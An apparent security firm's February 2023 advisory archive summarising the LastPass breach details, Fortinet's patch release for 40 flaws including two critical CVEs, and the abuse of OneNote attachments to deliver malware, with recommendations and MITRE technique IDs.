Month: February 2023

Categories
Cybersecurity Advisories

LastPass Reveals Additional Details of Their Second Hack

LastPass shared additional updates regarding the second security incident that was disclosed in December where an unnamed threat actor combined data stolen from a breach in August 2022 with information from another data breach, and a vulnerability in a third-party media software package to launch a coordinated attack. In this attack, the threat actor targeted a senior DevOps engineer by breaching their personal home computer and exploited vulnerable third-party software. They installed a keylogger, bypassed existing controls, and gained unauthorized access to cloud backups. 

The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault. The threat actor then exported the native corporate vault entries and content of shared folders, which contained encrypted secure notes with access and decryption keys needed to access the AWS S3 LastPass production backups, other cloud-based storage resources, and some related critical database backups.

In the aftermath of the incident, LastPass claimed to have upgraded its security posture by rotating critical and high privilege credentials and reissuing certificates obtained by the threat actor. In addition, they applied extra S3 hardening measures to put in place logging and alerting mechanisms. LastPass has released a new security advisory and a PDF detailing further information about the breach and the stolen data. The parent company of LastPass, GoTo, announced that it will inform individuals if their data has been breached and provide “actionable steps” to ensure greater security for their accounts. It is highly recommended for LastPass users to change their master passwords and all the passwords stored in their vaults to mitigate potential risks, if not done already.

Summary of data accessed

  • DevOps Secrets – restricted secrets that were used to gain access to our cloud-based backup storage.
  • Cloud-based backup storage – contained configuration data, API secrets, third-party integration secrets, customer metadata, and backups of all customer vault data. All sensitive customer vault data, other than URLs, file paths to installed LastPass Windows or macOS software, and certain use cases involving email addresses, were encrypted using our Zero knowledge model and can only be decrypted with a unique encryption key derived from each user’s master password. As a reminder, end user master passwords are never known to LastPass and are not stored or maintained by LastPass – therefore, they were not included in the exfiltrated data.
  • Backup of LastPass MFA/Federation Database – contained copies of LastPass Authenticator seeds, telephone numbers used for the MFA backup option (if enabled), as well as a split knowledge component (the K2 “key”) used for LastPass federation (if enabled). This database was encrypted, but the separately-stored decryption key was included in the secrets stolen by the threat actor during the second incident.

Additional details can be found here.

Recommendations

LastPass users are strongly urged to change their master passwords and all the passwords stored in their vaults to mitigate potential risks, if not done already.

Mitigations

LastPass has provided two security bulletins to assist customers in their own incident response efforts.

  • Security Bulletin: Recommended Actions for LastPass Free, Premium, and Families Customers. This bulletin guides our Free, Premium, and Families customers through a review of important LastPass settings designed to help secure their accounts by confirming best practices are being followed.
  • Security Bulletin: Recommended Actions for LastPass Business Administrators. This bulletin guides administrators for our Business and Teams customers through a risk assessment of LastPass account configurations and third-party integrations. It also includes information that is relevant to both non-federated and federated customers.

Resources & Related Articles

Categories
Cybersecurity Advisories

Fortinet Patches 40 Flaws Affecting FortiWeb, FortiOS, FortiNAC, and FortiProxy

Fortinet released security advisories for 40 vulnerabilities to inform customers of available security patches. Affected Fortinet products include FortiWeb, FortiOS, FortiNAC, and FortiProxy, among others. Two of the vulnerabilities are rated Critical, 15 are rated High, 22 are rated Medium, and one is rated Low in severity. 

CVE-2022-39952 (CVSS score: 9.8) is a severe bug in the FortiNAC solution that could lead to arbitrary code execution. It can be exploited by an unauthenticated attacker to write arbitrary files on the system and achieve remote code execution with the highest privileges. Organizations using FortiNAC 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, and all versions on the 8.8, 8.7, 8.6, 8.5, and 8.3 branches are urged prioritize applying the available security updates (FG-IR-22-300). Additionally, researchers from Horizon3 have recently released a PoC exploit code that is available on the company’s Github repository. FortiNAC administrators are strongly recommended to immediately upgrade to a version of the product that is not affected by the CVE-2022-39952 vulnerability. 

The second flaw, CVE-2021-42756 (CVSS score: 9.3), was discovered more than one year ago and is a set of stack-based buffer overflow in FortWeb’s proxy daemon that could allow an unauthenticated remote attacker to achieve arbitrary code execution via specially crafted HTTP requests. It has been fixed (FG-IR-21-186) in FortiWeb version 7.0.0 or above, 6.3.17 or above, 6.2.7 or above, 6.1.3 or above, and 6.0.8 or above. 

Affected Software 

See: PSIRT Advisories. 

Recommendation 

Organizations are recommended to view the PSIRT Advisories and apply available security updates for affected products. 

Resources & Related Articles 

Categories
Cybersecurity Advisories

Hackers Use Microsoft OneNote Attachments to Spread Malware

Description 

Malicious actors are using a new file format in the form of Microsoft OneNote attachments to spread malware to targets. Since OneNote allows users to insert attachments into a NoteBook, threat actors are abusing this feature by attaching malicious VBS attachments that automatically launch the script when double-clicked to download malware from a remote site and install it. Because the attachments look like a file’s icon in OneNote, threat actors overlay a large ‘Double click to view file’ bar over the inserted VBS attachments to hide them. If the ‘Click to View Document’ bar is moved out of the way, it can be observed that the malicious attachment includes multiple attachments. The threat actors did this in a way that if a user double clicks anywhere on the bar, it’s second click will land on the attachment, resulting in launching the malware. Luckily, when launching the OneNote attachments, the program provides a warning before installation. However, if a victim ignores the warning and clicks OK, it will launch the VBS script to download and install malware. This will allow the threat actor to remotely access a victim’s device to steal files, saved browser passwords, take screenshots, and in some cases, even record video using webcams.  

Fake DHL Email with OneNote Attachment 

Malicious OneNote Email Attachment

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:  

MDR Services 

  • We have added indicators related to known malicious threat actors into our blocklists in our MDR solution, FortiSIEM.  
  • Indicators are provided in the Indicators of Compromise section below if you would like to proactively block them in your firewall.  

EDR Services 

  • In addition to ongoing vendor IoC updates, we have implemented known IoC information to help with detection.   

As always, if we detect activity related to these exploits, we will alert you when applicable.  

Recommendations 

  • The best way to protect against malicious attachments is to simply not open files from people you do not know. If a file is mistakenly opened, do not disregard the warnings displayed by the operating system or application.  
  • If you see a warning that opening an attachment or link could harm your computer or files, simply do not press OK and close the application.  
  • If you feel it may be a legitimate email, share it with a security or Windows admin to help you verify if the file is safe.  
  • Consider blocking “.one” attachments. See: 
  • OneNote users are recommended to enable multi-factor authentication, use antivirus protection, and follow the best security practices for preventing phishing attacks.    

Detections 

SOC Prime has released rules to detect cyber attacks abusing OneNote attachments. Click here to access the full list of relevant detection content.  

MITRE Summary 

  • TA0002 – Execution 
  • T1047 – Windows Management Instrumentation  
  • TA0005 – Defense Evasion  
  • T1027 – Obfuscated Files or Information  
  • T1036 – Masquerading  
  • T1070.006 – Timestomp 
  • T1497 – Virtualization/Sandbox Evasion 
  • T1562.001- Disable or Modify Tools  
  • TA0006 – Credential Access  
  • T1003 – OS Credential Dumping  
  • TA0007 – Discovery 
  • T1057 – Process Discovery  
  • T1082 – System Information Discovery  
  • T1012 – Query Registry  
  • T1016 – System Network Configuration Discovery  
  • T1083 – File and Directory Discovery  TA0009 – Collection 
  • T1005 – Data from Local System  
  • TA0011 – Command and Control  
  • T1071 – Application Layer Protocol  

Indicators of Compromise (IoCs) 

Resources & Related Articles